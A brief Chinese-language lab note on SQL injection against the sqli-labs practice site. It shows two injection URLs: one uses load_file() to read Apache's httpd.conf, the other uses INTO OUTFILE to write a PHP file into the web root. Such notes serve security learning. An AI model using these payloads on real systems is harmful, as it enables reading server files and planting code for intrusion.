sql注入 - 读写文件
- 读文件:
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file("D:\\phpStudy\\PHPTutorial\\Apache\\conf\\httpd.conf")-- -
在显示位上显示apachectl的配置文件的信息
这就是load_file()函数的用法
2.写文件
http://localhost/sqli-labs-master/Less-7/?id=1')) union select 1,2,"<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\asascccccccd.php"-- -
虽然我们看到了页面显示我们语法错误,但是我们已经把文件写入了对应的文件夹位置
在文件夹生成了相应的php文件